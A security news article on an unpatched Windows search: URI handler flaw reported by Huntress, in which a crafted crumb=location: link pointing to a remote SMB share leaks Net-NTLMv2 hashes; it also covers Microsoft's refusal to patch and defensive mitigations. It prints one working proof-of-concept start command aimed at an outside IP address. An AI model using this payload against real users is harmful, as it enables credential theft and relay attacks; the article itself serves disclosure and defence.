"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating," Huntress researcher Andrew Schwartz said.
How the search: URI handler can leak NTLMv2 hashes
Researchers at Huntress disclosed that a previously unpatched issue in Windows' search: URI handler can be abused to disclose a user's NTLMv2 hash to an attacker. The technique relies on persuading a user to activate a crafted URL that causes the target machine to connect to a network share under an attacker-controlled server. When the victim system attempts the network connection, Windows triggers NTLM authentication and can expose the Net-NTLMv2 hash to the remote host.
Huntress provided a concrete example of the command form that accomplishes the behavior, showing a crafted URL that uses the "crumb=location:" parameter instead of the Snipping Tool's "filePath":
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
The payload leverages a Universal Naming Convention (UNC) path (\\10.0.1.100\share) embedded in the search: URI. The UN C access attempt triggers NTLM authentication and the leak of the Net-NTLMv2 hash.
Echoes of CVE-2026-33829 and prior "crumb" abuse
Huntress compared this shortcoming directly to CVE-2026-33829, a spoofing vulnerability in the Windows Snipping Tool's ms-screensketch: URI handler that Microsoft patched in April 2026. In that case, the Snipping Tool's handler accepted a "filePath" parameter, failed to validate it, and would reach out to any UNC path passed to it, producing the same NTLM authentication leakage and exposing Net-NTLMv2 hashes.
Huntress noted the new search: vector achieves the same end using the crumb parameter. The use of a "crumb" parameter to exfiltrate hashes is not entirely novel: Varonis documented a crumb-based hash-theft technique (CVE-2023-35636) in February 2024, establishing precedent for this class of misuse.
Responsible disclosure and Microsoft's response
Huntress reported the issue under responsible disclosure on April 15, 2026. According to the disclosure timeline, Microsoft reviewed the report and declined to produce a patch. Microsoft told Huntress that it will only service vulnerabilities rated Important and Critical, and the company stated that "only Important and Critical severity cases meet our bar for servicing."
The vulnerability as described by Huntress carried a Moderate rating and therefore, per Microsoft's stated servicing bar, was not scheduled for remediation.
Mitigations recommended while the issue remains unpatched
With no patch available, Huntress and the disclosure advice in the research note recommend several practical mitigations:
- Block outbound SMB on hosts that do not require it, specifically TCP/445 and TCP/139, to prevent connections to attacker-controlled SMB servers.
- Enforce SMB signing so that any captured hashes cannot be relayed successfully against internal services.
- Disable NTLM where applicable to reduce the attack surface that depends on NTLM-based authentication.
What this means for technologists, affected enterprises, and end users
- Technologists and security teams: Review and, where feasible, implement the recommended network controls—block TCP/445 and TCP/139 outbound on hosts that do not need SMB, enable SMB signing, and evaluate NTLM dependency across services.
- Affected enterprises and procurement leaders: Expect lingering risk from an unpatched Moderate-rated URI handler issue; incorporate the mitigations into deployment baselines and incident-response plans given that capture of Net-NTLMv2 hashes can enable relay attacks and deeper network access.
- End users and administrators: Avoid clicking unexpected or unsolicited links that could launch URI handlers, and coordinate with IT to ensure appropriate network-level controls are in place.
The mechanics are plain and immediate: a crafted search: link can induce a client machine to call out to an attacker-controlled SMB share and hand over a Net-NTLMv2 hash. Huntress has detailed the pathway and Microsoft has, for now, declined to remediate under its servicing policy. The combination—an authoritative demonstration of leakage, an established exploit path using "crumb=location:", and a decision not to patch—leaves defenders reliant on network controls and configuration changes to close the window of opportunity for relay attacks.
Read the original Huntress disclosure at https://thehackernews.com/2026/06/unpatched-windows-search-uri.html




